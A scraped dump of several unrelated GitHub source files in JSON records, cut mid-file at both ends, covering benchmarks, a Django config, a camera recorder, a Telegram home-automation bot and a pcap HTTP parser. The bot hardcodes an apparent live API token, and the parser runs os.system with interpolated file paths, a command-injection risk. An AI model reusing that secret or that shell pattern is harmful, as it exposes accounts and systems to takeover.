RunFn, maybe_forced_preset\n\n\nFLAGS = flags.FLAGS\nTBatchSize = Union[str, int]\nlogger = logging.getLogger(__name__)\n\nflags.DEFINE_integer('concurrent_jobs', 2, 'Maximum concurrent running jobs', lower_bound=1)\nflags.DEFINE_integer('total_num', 0, 'Only run this number of workloads. If 0, means no limit', lower_bound=0)\nflags.DEFINE_string('select_wl', '', 'Select only to run workloads from the list of canonical names given')\n\n\nclass Cases(Enum):\n Shortest = ('jct', False)\n Longest = ('jct', True)\n Smallest = ('persistmem', False)\n Largest = ('persistmem', True)\n\n\ndef gen_workload_list(selection):\n # type: (str) -> Iterable[Tuple[WTL, RunConfig]]\n \"\"\"Select workloads based on commandline\"\"\"\n if not selection:\n blacklist = ['speech', 'seq2seq', 'mnistlg', 'mnistsf', 'mnistcv']\n names = (\n (v, bs)\n for k, v in WTL.known_workloads.items()\n for bs in v.available_batch_sizes()\n if k not in blacklist\n )\n else:\n names = []\n for cname in unique((cname for cname in selection.split(',')), stable=True):\n if '_' not in cname:\n raise UsageError(f\"Not a canonical name: {cname}\")\n name, bs = cname.split('_', 1)\n bs = try_with_default(int, bs, ValueError)(bs)\n names.append((WTL.from_name(name), bs))\n\n # Find all available batch_num with JCT and mem data\n return (\n (wtl, RunConfig(bs, bn, None))\n for wtl, bs in names\n for bn in wtl.available_batch_nums(bs)\n )\n\n\ndef main(argv):\n # type: (Sequence[str]) -> None\n scfg = maybe_forced_preset(presets.MostEfficient)\n scfg.scheduler = 'pack'\n\n cases = (Cases[c] for c in argv) if argv else Cases\n templates = list(gen_workload_list(FLAGS.select_wl))\n if FLAGS.total_num > 0:\n templates = templates[:FLAGS.total_num]\n\n logger.info(\"Selected the following list of workloads\")\n for wtl, rcfg in templates:\n logger.info(f\" {wtl.canonical_name(rcfg)} of {rcfg.batch_num} iters\")\n\n # Check if workloads have the info we need\n for wtl, rcfg in templates:\n for field in ['jct', 'persistmem']:\n if wtl.geometry(rcfg, Executor.Salus)[field] is None:\n raise ValueError(f'Missing {field} data for workload {wtl.canonical_name(rcfg)} of {rcfg.batch_num} iters, available geometries: {wtl._geometries}')\n\n for case in cases:\n logdir = FLAGS.save_dir / case.name\n\n # create workload instances\n workloads = (wtl._create_from_rcfg(rcfg, Executor.Salus) for wtl, rcfg in templates)\n # sort workload according to case\n key, desc = case.value\n workloads = sorted(workloads, key=lambda w: w.geometry[key], reverse=desc)\n\n def limit_concurrent(wls):\n # type: (Iterable[Workload]) -> None\n \"\"\"Wait for something to finish\"\"\"\n gone, alive = SalusServer.wait_workloads(wls, timeout=0)\n while len(alive) >= FLAGS.concurrent_jobs:\n gone, alive = SalusServer.wait_workloads(wls, timeout=0)\n time.sleep(.25)\n\n actions = chain(*(\n [w, RunFn(limit_concurrent)]\n for w in workloads\n ))\n\n run_seq(scfg.copy(output_dir=logdir), *actions)\n","repo_name":"SymbioticLab/Salus","sub_path":"benchmarks/exps/old/bigrun.py","file_name":"bigrun.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"67"} +{"seq_id":"38677798228","text":"# django-modeladmin-reorder\nADMIN_REORDER = (\n # 세미나\n {\n \"app\": \"seminars\",\n \"label\": \"세미나\",\n \"models\": (\n {\"model\": \"seminars.Seminar\", \"label\": \"세미나\"},\n {\"model\": \"seminars.Track\", \"label\": \"트랙\"},\n {\"model\": \"seminars.Session\", \"label\": \"세션\"},\n ),\n },\n {\n \"app\": \"seminars\",\n \"label\": \"세미나 추가정보\",\n \"models\": (\n {\"model\": \"seminars.Speaker\", \"label\": \"발표자\"},\n {\"model\": \"seminars.SpeakerLinkType\", \"label\": \"발표자 링크 유형\"},\n {\"model\": \"seminars.SpeakerLink\", \"label\": \"발표자 링크\"},\n {\"model\": \"seminars.SessionVideo\", \"label\": \"세션 영상\"},\n {\"model\": \"seminars.SessionLink\", \"label\": \"세션 링크\"},\n {\"model\": \"seminars.SessionFile\", \"label\": \"세션 첨부파일\"},\n ),\n },\n # 스폰서\n {\n \"app\": \"sponsors\",\n \"label\": \"스폰서\",\n \"models\": (\n {\"model\": \"sponsors.SponsorTier\", \"label\": \"스폰서 등급\"},\n {\"model\": \"sponsors.Sponsor\", \"label\": \"스폰서\"},\n ),\n },\n # 인증\n {\n \"app\": \"members\",\n \"label\": \"인증 및 권한\",\n \"models\": (\n {\"model\": \"members.User\", \"label\": \"사용자\"},\n {\"model\": \"auth.Group\", \"label\": \"그룹\"},\n {\"model\": \"authtoken.Token\", \"label\": \"인증토큰\"},\n {\"model\": \"rest_framework_api_key.APIKey\", \"label\": \"APIKey\"},\n ),\n },\n)\n","repo_name":"LeeHanYeong/let-us-Go","sub_path":"app/config/settings/base/admin_reorder.py","file_name":"admin_reorder.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"5142523116","text":"import threading\r\nimport os\r\nimport urllib.request\r\nimport urllib\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\nimport sys\r\nfrom datetime import datetime\r\n\r\n\r\nfolder=os.getcwd()\r\nprint(folder)\r\nsaveTo=\"H:\\\\recording\"\r\nfile='cameraaddress.txt'\r\nIPADDR=[]\r\n# print(\"Default\",IPADDR)\r\n\r\nwith open(os.path.join(folder,file),'r') as f:\r\n for line in f.read().split(\"\\n\"):\r\n print(line, sep='\\n')\r\n \r\n\r\nprint(\"these are addresses stored \",\"if wanna reset then press 1, else 0\")\r\nre=int(input())\r\n\r\nif re==1:\r\n while(True):\r\n print(\"enter IP address:port\")\r\n ip=input()\r\n temp='http://'+ip+'/video'\r\n IPADDR.append(temp)\r\n print (\"Add more? 1 Yes 0 No\")\r\n if(int(input())==0):\r\n break\r\n else:\r\n continue\r\n\r\nif re==1:\r\n with open(os.path.join(folder,file),'w') as f:\r\n for addr in IPADDR:\r\n f.write(addr+\"\\n\")\r\nelse:\r\n IPADDR=[]\r\n with open(os.path.join(folder,file),'r') as f:\r\n for line in f.read().split(\"\\n\"):\r\n IPADDR.append(line)\r\n\r\nprint(IPADDR)\r\n\r\nclass MultiThreading(threading.Thread):\r\n def __init__(self,threadID,cameraID,IPaddress,IsRun):\r\n threading.Thread.__init__(self)\r\n self.threadID=threadID\r\n self.cameraID=cameraID\r\n self.IPaddress=IPaddress\r\n self.IsRun=True\r\n # self.currDate=str(datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\"))\r\n # self.rec=cv2.VideoWriter(os.path.join(saveTo,'output-'+self.cameraID+\"-\"+self.currDate+'.avi'),cv2.VideoWriter_fourcc('M','J','P','G'),30,(640,480))\r\n\r\n def run(self):\r\n print(\"starting camera \", self.cameraID)\r\n # start the camera and process\r\n if self.IsRun:\r\n # openCamera(self.cameraID,self.IPaddress,self.IsRun,self.rec)\r\n openCamera(self.cameraID,self.IPaddress,self.IsRun)\r\n else:\r\n return 0 #self.IsRun # thread stopped\r\n\r\n\r\n# def record(cameraID,frame,IPaddress):\r\n\r\n# #define recording save:\r\n\r\n# out.write(frame)\r\n \r\n\r\n\r\n# define camera open\r\n# def openCamera(cameraID,IPaddress,IsRun,rec):\r\ndef openCamera(cameraID,IPaddress,IsRun):\r\n print(cameraID)\r\n try:\r\n cam=cv2.VideoCapture(IPaddress)\r\n if cam is None or not cam.isOpened() :\r\n print(\"ERROR HANDLED BY IF IN TRY\")\r\n print(\"camera \",cameraID,\" is unavailable\", \" at the IP:port \",IPaddress)\r\n print(\"retrying from due to TCP error \")\r\n for i in range(0,2):\r\n time.sleep(i) # seconds\r\n print(\"retrying in \",i ,\"seconds for the camera ID \", cameraID, \"IP:port \" ,IPaddress )\r\n openCamera(cameraID,IPaddress,IsRun)\r\n # openCamera(cameraID,IPaddress,IsRun,rec)\r\n\r\n else:\r\n currDate=str(datetime.now().strftime(\"%d-%m-%Y-%H-%M-%S\"))\r\n rec=cv2.VideoWriter(os.path.join(saveTo,'output-'+cameraID+\"-\"+currDate+'.avi'),cv2.VideoWriter_fourcc('M','J','P','G'),20,(640,480)) #20 is normal speed 30=1.5x 60=3x\r\n print(\"FEED STARTED \",cameraID,\"IP:port \",IPaddress)\r\n while True and IsRun :\r\n _,frame=cam.read()\r\n rec.write(frame)\r\n cv2.imshow(cameraID,frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n IsRun=False\r\n print(\"forced destruction of IP:port@ \",IPaddress,\" camera ID \", cameraID)\r\n cam.release()\r\n rec.release()\r\n cv2.destroyAllWindows()\r\n exit(1)\r\n break\r\n \r\n except :\r\n if not IsRun:\r\n return 0\r\n else:\r\n try:\r\n rec.release()\r\n cam.release()\r\n cv2.destroyAllWindows()\r\n except :\r\n pass\r\n\r\n print(\"ERROR HANDLED BY EXCEPTION\")\r\n print(\"failure in connection to the IP:port\", cameraID, IPaddress)\r\n for i in range(0,2):\r\n time.sleep(i) # seconds\r\n print(\"retrying in \",i ,\"seconds for the camera ID \", cameraID, \"IP:port \" ,IPaddress )\r\n print(\"trying to connect\")\r\n # openCamera(cameraID,IPaddress,IsRun,rec)\r\n openCamera(cameraID,IPaddress,IsRun)\r\n\r\nnIP=len(IPADDR)\r\nthreads=[]\r\nfor i in range(0,nIP):\r\n if IPADDR[i]!='':\r\n thread=MultiThreading(str(i),str(i),IPADDR[i],True)\r\n threads.append(thread)\r\n\r\n else:\r\n continue\r\n\r\nfor start_thread in threads:\r\n start_thread.start()\r\n \r\n\r\n# thread1=MultiThreading('1','1','http://192.168.1.2:8080/video')\r\n# thread1.start()\r\n# thread2=MultiThreading('2','2','http://192.168.1.7:8081/video')\r\n# thread2.start()\r\n# while True:\r\n\r\n\r\n# _,frame=cam.read()\r\n# # Finally decode the array to OpenCV usable format ;) \r\n# #img = cv2.imdecode(imgNp,-1)\t\r\n# \t# put the image on screen\r\n# cv2.imshow('IPWebcam',frame)\r\n\r\n# if cv2.waitKey(1) & 0xFF == ord('q'):\r\n# break\r\n# cam.release()\r\n# cv2.destroyAllWindows()\r\n","repo_name":"whysoseriousoni/http-PY-video-recoreder","sub_path":"ip video feed from url 27-8.py","file_name":"ip video feed from url 27-8.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71386781015","text":"def uint2bytes(n):\n result = []\n while n > 127:\n n, r = divmod(n, 128)\n result.append(r + 128)\n return bytearray(result + [n])\n\ndef bytes2uint(bts):\n num = 0\n for byte in reversed(bts):\n num = num * 128 + (byte & 127)\n return num\n\ndef int2bytes(n):\n result = []\n while abs(2*n + 1) > 128:\n n, r = divmod(n, 128)\n result.append(r + 128)\n return bytearray(result + [n % 128])\n\ndef bytes2int(bts):\n num = 0\n for byte in reversed(bts):\n num = num * 128 + (byte & 127)\n return num - 2**(7 * len(bts)) if bts[-1] & 64 else num\n\nassert list(uint2bytes(624485)) == [0xE5, 0x8E, 0x26]\nassert bytes2uint([0xCD, 0xE1, 0xB2, 0x02]) == 5025997\nassert list(int2bytes(-123456)) == [0xC0, 0xBB, 0x78]\nassert bytes2int([0x9B, 0xF1, 0x59]) == -624485\n","repo_name":"hvox/data-serialization-formats","sub_path":"variable_length_code/leb128.py","file_name":"leb128.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10563499878","text":"from app.api_1_0 import api\nfrom flask import request,jsonify\nfrom app.model import productModel\nfrom app.validation import btProduct,isInt\n'''\n获取近期product\n@url /product/recent?count=1\nhttp GET\n'''\n@api.route('/product/recent',methods=['GET'])\ndef getRecentProduct():\n count=request.values.get('count')\n if count is None:\n count=15\n btProduct('/product/recent',count)\n recentProducts=productModel.getRecentProducts(count)\n return jsonify(recentProducts)\n'''\n获取分类下的product\n@url /product/by_category?id=2\nhttp GET\n'''\n@api.route('/product/by_category',methods=['GET'])\ndef getAllInCategory():\n id=request.values.get('id')\n isInt('/product/by_category',id)\n allInCategory=productModel.getProductsByCategoryID(id)\n return jsonify(allInCategory)\n'''\n获取某个product的详细信息\n@url /product/1\nhttp GET\n'''\n@api.route('/product/',methods=['GET'])\ndef getOne(id):\n isInt('/product/',id)\n productDetail=productModel.getProductDetail(id)\n return jsonify(productDetail)\n\n\n","repo_name":"seven-share/flaskPractice","sub_path":"flaskShop/moocShop/app/api_1_0/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21965379538","text":"# -*- coding: utf-8 -*-\n\nimport serial\nimport telepot \nfrom telepot.loop import MessageLoop \nfrom time import sleep\nimport asyncio\n\nimport camara_functions as camara\nimport weather\nimport leds_functions as light\n\n# Configuracion para serializar el arduino\narduino = serial.Serial('/dev/ttyACM0', 9600)\narduino.flush()\n\n# Función asincrona que rebirirá si se toco el timbre o si el detector de gas manda una señal\nasync def arduinoSerial():\n while True:\n if arduino.in_waiting > 0:\n line = str(arduino.readline()) #.decode('uft-8').rstrip()\n timbre = line[3]\n gas = line[5]\n print(line)\n #print(timbre)\n #print(gas)\n if timbre == '1': bot.sendMessage(1597500632, '[ALERTA]: Han tocado el timbre')\n if gas == '1': bot.sendMessage(1597500632, '[ALERTA]: Fuga de gas!!!')\n\n# Comunicación con el bot\ndef handle(msg):\n\n # Obtenemos informacion del mensaje\n chat_id = msg['chat']['id'] \n command = msg['text'] \n print(chat_id) \n print ('Received:')\n print(command)\n \n # Comparamos el mensaje recibido y ejecutamos cierta funcion segun sea el caso\n if command == '/hi':\n bot.sendMessage(chat_id, \"Hola nena UwU <3\")\n\n elif command == '/time':\n time = weather.time()\n bot.sendMessage(chat_id, time)\n\n elif command == '/date':\n date = weather.date()\n bot.sendMessage(chat_id, date)\n\n elif command.startswith('/turn_on '):\n try:\n led = int(command[command.index(' ') + 1:])\n output = light.turn_on(led)\n output()\n bot.sendMessage(chat_id, 'Led {} encendido'.format(str(led)))\n except:\n bot.sendMessage(chat_id, 'Error: Intentelo más tarde')\n \n elif command.startswith('/turn_off '):\n try:\n led = int(command[command.index(' ') + 1:])\n output = light.turn_off(led)\n output()\n bot.sendMessage(chat_id, 'Led {} apagado'.format(str(led)))\n except:\n bot.sendMessage(chat_id, 'Error: Intentelo más tarde')\n\n elif command.startswith('/weather '):\n try:\n info = weather.get_info(command)\n bot.sendMessage(chat_id, str(info))\n except:\n bot.sendMessage(chat_id, str('Error, intentelo más tarde :c'))\n \n elif command == '/state_list':\n leds_states = light.leds_state_list()\n bot.sendMessage(chat_id, leds_states)\n\n elif command == '/photo':\n try:\n bot.sendMessage(chat_id, str(\"Taking photo ...\"))\n camara.take_foto()\n bot.sendMessage(chat_id, str(\"Ready!!!\"))\n bot.sendPhoto(chat_id, open('/home/pi/Proyectos/projectTelegramBot_v2/media/captura_rasp.jpg', 'rb'))\n except:\n bot.sendMessage(chat_id, str('Error, intentelo más tarde :c'))\n \n elif command == '/video':\n try:\n bot.sendMessage(chat_id, str(\"recording ...\"))\n camara.record_video()\n bot.sendMessage(chat_id, str(\"Ready!!!\"))\n bot.sendVideo(chat_id, open('/home/pi/Proyectos/projectTelegramBot_v2/media/video_rasp.h264', 'rb'))\n except:\n bot.sendMessage(chat_id, str('Error, intentelo más tarde :c'))\n\n# Insertamos el token de telegram debajo\nbot = telepot.Bot('1973126486:AAFjyJsMHAM8LhcXUTexWUKREtbZJnu6Noc')\nprint (bot.getMe())\n\n# Empieza a escuchar al bot de telegram y cualquier mensaje que reciba, la funcion handle será llamada\nMessageLoop(bot, handle).run_as_thread()\nprint ('Listening....')\n\n# Ejecutamos el programa para leer los datos del arduino\nasyncio.run(arduinoSerial())\n\n# Mantenemos el programa corriendo\nwhile 1:\n sleep(10)\n","repo_name":"PakoMtzR/telegram_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39354809357","text":"from enum import Enum\nimport xml.etree.ElementTree as ET\nfrom . import prefix_for_teamtype, Skills\nfrom .player import create_player\n\n\nMAX_PLAYER_COUNT = 16\n\n\nclass CoachType(Enum):\n LOCAL = 0\n AI = 1\n REMOTE = 2\n\n\ndef create_team(db, team_type):\n table_prefix = prefix_for_teamtype(team_type)\n cur = db.cursor()\n cur.execute('SELECT Match_strSave FROM SavedGameInfo')\n xml_str = cur.fetchone()[0]\n match_xml = ET.fromstring(xml_str)\n coach_type = CoachType(int(match_xml.find(f'.//{table_prefix}/ePlayerType').text))\n cur.execute('SELECT team.strName, race.DATA_CONSTANT, iValue, iPopularity, iRerolls, bApothecary '\n f'FROM {table_prefix}_Team_Listing team INNER JOIN {table_prefix}_Races race ON idRaces = race.ID')\n team = Team(*cur.fetchone(), team_type, coach_type)\n player_numbers = match_xml.findall(f'.//{table_prefix}/vecPlayersInit/*/Number')\n player_number_map = {}\n for i, num in enumerate(player_numbers):\n player_number_map[int(num.text)] = i\n\n player_rows = cur.execute('SELECT ID, iNumber, strName, '\n 'Characteristics_fMovementAllowance, Characteristics_fStrength, '\n 'Characteristics_fAgility, Characteristics_fArmourValue, '\n 'idPlayer_Levels, iExperience, iValue '\n f'FROM {table_prefix}_Player_Listing')\n player_cache = {}\n for row in player_rows:\n player = create_player(team, *row[1:])\n player_cache[row[0]] = player\n team.add_player(player_number_map[player.number], player)\n\n type_skills = cur.execute('SELECT player.ID, idSkill_Listing, description '\n f'FROM {table_prefix}_Player_Listing player '\n f'INNER JOIN {table_prefix}_Player_Type_Skills type_skills '\n 'ON player.idPlayer_Types = type_skills.idPlayer_Types')\n\n for skill_row in type_skills:\n player = player_cache[skill_row[0]]\n try:\n player.skills.append(Skills(skill_row[1]))\n except ValueError as ex:\n raise ValueError(f\"Unidentified skill {skill_row[1]} ({skill_row[2]}) for {team.name} player \"\n f\"#{player.number} {player.name}\") from ex\n\n learned_skills = cur.execute(f'SELECT idPlayer_Listing, idSkill_Listing FROM {table_prefix}_Player_Skills')\n\n for skill_row in learned_skills:\n player = player_cache[skill_row[0]]\n try:\n player.skills.append(Skills(skill_row[1]))\n except ValueError as ex:\n raise ValueError(f\"Unidentified learned skill {skill_row[1]} for {team.name} player \"\n f\"#{player.number} {player.name}\") from ex\n\n cur.close()\n return team\n\n\nclass Team:\n def __init__(self, name, race, team_value, fame, rerolls, apothecary, team_type, coach_type=CoachType.AI):\n self.name = name\n self.race = race\n self.team_value = team_value\n self.fame = fame\n self.rerolls = rerolls\n self.apothecaries = apothecary\n self.team_type = team_type\n self._players = [None] * MAX_PLAYER_COUNT\n self._player_number_map = {}\n self.coach_type = coach_type\n\n def add_player(self, idx, player):\n self._player_number_map[player.number] = idx\n self._players[idx] = player\n player.team = self\n\n def get_players(self):\n return filter(None, self._players)\n\n def get_player(self, idx):\n return self._players[idx]\n\n def get_player_by_number(self, number):\n idx = self._player_number_map[int(number)]\n return self._players[idx]\n\n def get_player_number(self, idx):\n return self._players[idx].number\n","repo_name":"IBBoard/bbreplay","sub_path":"bbreplay/teams.py","file_name":"teams.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19502703438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport magic\nimport moment\n# Local import\nfrom parser import parser\nfrom ..utils import utils\nfrom ..observable import observable\n\n\"\"\"http parser\"\"\"\n\nclass http(parser):\n \"\"\"\n http parser\n \"\"\"\n\n explode_result = None\n\n def explode(self):\n \"\"\"\n Execute chaosreader and parse generate files to extract observables\n \"\"\"\n\n # Execute chaosreader\n os.system('{crbin} -v \"{pcap}\" -D \"{dest}\" > {output}'.format(\n dest=self.storage+'/'+os.path.basename(self.pcap_filename)+\".sessions\", pcap=self.pcap_filename, crbin=os.path.realpath(self.config['chaosreader']), output=self.storage+'/chaosreader.log'\n ))\n\n session_id = []\n pcapsessiondir = self.storage+'/' + os.path.basename(self.pcap_filename)+\".sessions/\"\n\n # Retrieve all session files\n if(os.path.exists(pcapsessiondir)):\n files = [f for f in os.listdir(pcapsessiondir) if os.path.isfile(\n os.path.join(pcapsessiondir, f))]\n for file in files:\n if str(file).startswith('session_'):\n matches = re.search(r\"session_(\\d+)\\.info\", file)\n if matches:\n session_id += [matches.group(1)]\n session_id = sorted(session_id)\n\n # For each session file\n sessions = []\n for sessid in session_id:\n if True:\n\n # Get the main information\n\n info = utils.file_get_contents(\n pcapsessiondir+\"session_\"+sessid+\".info\")\n info = (info.split('\\n'))\n\n data = []\n data += [('Session', sessid)]\n for line in info[2:-1]:\n linesplited = line.split(': ')\n key = linesplited[0].strip().replace(' ', '_')\n value = linesplited[1].strip()\n data += [(key, value)]\n cursess = dict(data)\n\n\n # If session is http : analyze the session\n if cursess['Dest_service'] == 'http':\n\n # Retrieve the http requests and responses\n\n raw = utils.file_get_contents(pcapsessiondir+\"session_\"+sessid+\".http.html\")\n raw = raw.replace('', '')\n raw = raw.replace('', '')\n raw = raw.replace('', '')\n raw = raw.replace('>', '')\n raw = raw.replace('', '')\n raw = raw.replace('\\n', '')\n raw = raw.replace('\\r', '\\n')\n\n # Isolate requests and reponses\n matches = re.finditer(r\"(^([A-z0-9\\-]+)(\\:\\s)(.*))|(([A-Z]+)\\s(\\S+)\\s((HTTP)\\/\\d\\.\\d))|(((HTTP)\\/\\d\\.\\d)\\s(\\d+)\\s(.+))\", raw, re.MULTILINE)\n\n RequestE = {}\n current = \"Request\"\n id = 0\n # Associate request with response\n for matchNum, match in enumerate(matches):\n matchNum = matchNum + 1\n\n if(match.group(9) == 'HTTP'):\n # Request\n id += 1\n current = \"Request\"\n RequestE['{}-{}'.format(sessid, id)] = {\n \"Request\": {\n \"Method\": match.group(6),\n \"Url\": match.group(7),\n \"Proto\": match.group(8),\n \"Headers\": {}\n },\n \"Response\": {}\n }\n elif(match.group(12) == 'HTTP' and id != 0):\n current = \"Response\"\n RequestE['{}-{}'.format(sessid, id)]['Response'] = {\n \"Status\": {\n \"Code\": match.group(13),\n \"Message\": match.group(14),\n },\n \"Proto\": match.group(11),\n \"Headers\": {}\n }\n else:\n if(match.group(2) != '' and id != 0):\n RequestE['{}-{}'.format(\n sessid, id)][current]['Headers'][match.group(2)] = match.group(4)\n\n cursess['Http'] = RequestE\n\n\n # For each Request-Response, retrieve files\n for sessionHttp in cursess['Http']:\n cursessHttp = cursess['Http'][sessionHttp]\n cursess['Http'][sessionHttp]['Dropped_files'] = []\n file_id = int(sessionHttp.split('-')[1])\n if(file_id < 10):\n file_id = '0{}'.format(file_id)\n file_dname = 'session_{}.part_{}'.format(\n sessid, file_id)\n \n # For each dropped files\n for findF in files:\n if(findF.startswith(file_dname)):\n \n # Find the filename\n filename = None\n\n # Filename in headers\n if cursess['Http'][sessionHttp]['Response'].get('Headers') and cursess['Http'][sessionHttp]['Response']['Headers'].get('Content-Disposition'):\n contentDisposition = cursess['Http'][sessionHttp]['Response']['Headers'].get(\n 'Content-Disposition').split('filename=')\n filename = contentDisposition[1].strip()\n # Filename in url\n else:\n matches = re.search(r\"(([A-z0-9\\-\\_\\%]+\\.\\S*?))(\\?\\S*)?$\", cursess['Http'][sessionHttp]['Request']['Url'])\n if matches:\n filename = matches.group(2)\n \n # Save file info\n findFpath = pcapsessiondir+findF\n cursess['Http'][sessionHttp]['Dropped_files'] += [{\n \"path\": findFpath,\n \"mime\": magic.from_file(findFpath, mime=True),\n \"filename\": filename,\n \"hash\": {\n \"sha256\": utils.file_hash('sha256', findFpath),\n \"md5\": utils.file_hash('md5', findFpath)\n }\n }]\n\n sessions += [cursess]\n\n # Construct the final collections\n outraw = {}\n for session in sessions:\n if(session.get('Http') and session.get('Http') != None):\n for idpart in (session.get('Http')):\n\n outraw[session['Session']] = {}\n outraw[session['Session']]['fqdn'] = {}\n \n part = session['Http'].get(idpart)\n\n fqdn_l = part['Request']['Headers']['Host'].split('.')\n fqdn = '{}.{}'.format(fqdn_l[-2], fqdn_l[-1])\n\n if(fqdn not in outraw):\n outraw[session['Session']]['fqdn'][fqdn] = {'domain': {}, 'ip': {}}\n\n outraw[session['Session']]['fqdn'][fqdn]['domain'][str(part['Request']['Headers']['Host'])] = {}\n\n outraw[session['Session']]['ip'] = list(set([\n session.get('Source_addr'),\n session.get('Dest_addr')\n ]))\n\n outraw[session['Session']]['date'] = list(set([\n session.get('First_time'),\n session.get('Last_time')\n ]))\n\n url = part['Request']['Url']\n if not url.startswith('http://'):\n url = 'http://'+part['Request']['Headers']['Host']+url\n\n outraw[session['Session']]['fqdn'][fqdn]['domain'][str(\n part['Request']['Headers']['Host'])][url] = {}\n\n for dfile in part['Dropped_files']:\n outraw[session['Session']]['fqdn'][fqdn]['domain'][str(part['Request']['Headers']['Host'])][url][dfile['path']] = {\n \"hash\": dfile['hash'],\n \"filename\": dfile['filename']\n }\n\n self.explode_result = outraw\n\n\n def report(self):\n outraw = self.explode_result\n outfinal0 = []\n for session in outraw:\n outfinal1 = []\n for fqdn in outraw[session]['fqdn']:\n for domain in outraw[session]['fqdn'][fqdn]['domain']:\n for url in outraw[session]['fqdn'][fqdn]['domain'][domain]:\n for file in outraw[session]['fqdn'][fqdn]['domain'][domain][url]:\n filechild = outraw[session]['fqdn'][fqdn]['domain'][domain][url][file]\n for hashd in filechild['hash']:\n outfinal1 += [observable(filechild['hash'].get(hashd), 'hash').__dict__]\n if(filechild['filename'] != None):\n outfinal1 += [observable(filechild['filename'], 'filename').__dict__]\n outfinal1 += [observable(file, 'file').__dict__]\n outfinal1 += [observable(url, 'url').__dict__]\n outfinal1 += [observable(domain, 'domain').__dict__]\n for ip in outraw[session]['ip']:\n outfinal1 += [observable(ip, 'ip').__dict__]\n for date in outraw[session]['date']:\n m = moment.date(date, '%a %b %d $H:$M:$S %Y')\n outfinal1 += [observable(m.format('YYYY-MM-DD HH:mm:ss'), 'date').__dict__] \n outfinal1 += [observable(fqdn, 'fqdn').__dict__]\n outfinal0 += [observable(session, 'session', outfinal1).__dict__]\n return outfinal0\n\n\n\n ","repo_name":"Cyberprotect/Ceres-Packet-Exploder","sub_path":"cerespacketexploder/parser/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":10600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5865899079","text":"import random\n\nimport tensorflow as tf\n\nfrom keras_nlp.api_export import keras_nlp_export\nfrom keras_nlp.layers.preprocessing.preprocessing_layer import (\n PreprocessingLayer,\n)\nfrom keras_nlp.utils.tensor_utils import convert_to_ragged_batch\nfrom keras_nlp.utils.tensor_utils import is_int_dtype\nfrom keras_nlp.utils.tensor_utils import is_string_dtype\n\n\n@keras_nlp_export(\"keras_nlp.layers.RandomDeletion\")\nclass RandomDeletion(PreprocessingLayer):\n \"\"\"Augments input by randomly deleting tokens.\n\n This layer comes in handy when you need to generate new data using deletion\n augmentation as described in the paper [EDA: Easy Data Augmentation\n Techniques for Boosting Performance on Text Classification Tasks]\n (https://arxiv.org/pdf/1901.11196.pdf). The layer expects the inputs to be\n pre-split into token level inputs. This allows control over the level of\n augmentation, you can split by character for character level swaps, or by\n word for word level swaps.\n\n Input data should be passed as tensors, `tf.RaggedTensor`s, or lists. For\n batched input, inputs should be a list of lists or a rank two tensor. For\n unbatched inputs, each element should be a list or a rank one tensor.\n\n Args:\n rate: The probability of a token being chosen for deletion.\n max_deletions: The maximum number of tokens to delete.\n skip_list: A list of token values that should not be considered\n candidates for deletion.\n skip_fn: A function that takes as input a scalar tensor token and\n returns as output a scalar tensor True/False value. A value of\n True indicates that the token should not be considered a\n candidate for deletion. This function must be tracable--it\n should consist of tensorflow operations.\n skip_py_fn: A function that takes as input a python token value and\n returns as output `True` or `False`. A value of True\n indicates that should not be considered a candidate for deletion.\n Unlike the `skip_fn` argument, this argument need not be\n tracable--it can be any python function.\n seed: A seed for the random number generator.\n\n Examples:\n\n Word level usage.\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n\n Character level usage.\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.unicode_split([\"Hey Dude\", \"Speed Up\"], \"UTF-8\")\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, axis=-1)\n \n\n Usage with skip_list.\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4,\n ... skip_list=[\"Keras\", \"Tensorflow\"], seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n\n Usage with skip_fn.\n >>> def skip_fn(word):\n ... return tf.strings.regex_full_match(word, r\"\\\\pP\")\n >>> keras.utils.set_random_seed(1337)\n >>> inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=keras_nlp.layers.RandomDeletion(rate=0.4,\n ... skip_fn=skip_fn, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n\n Usage with skip_py_fn.\n >>> def skip_py_fn(word):\n ... return len(word) < 4\n >>> keras.utils.set_random_seed(1337)\n >>> 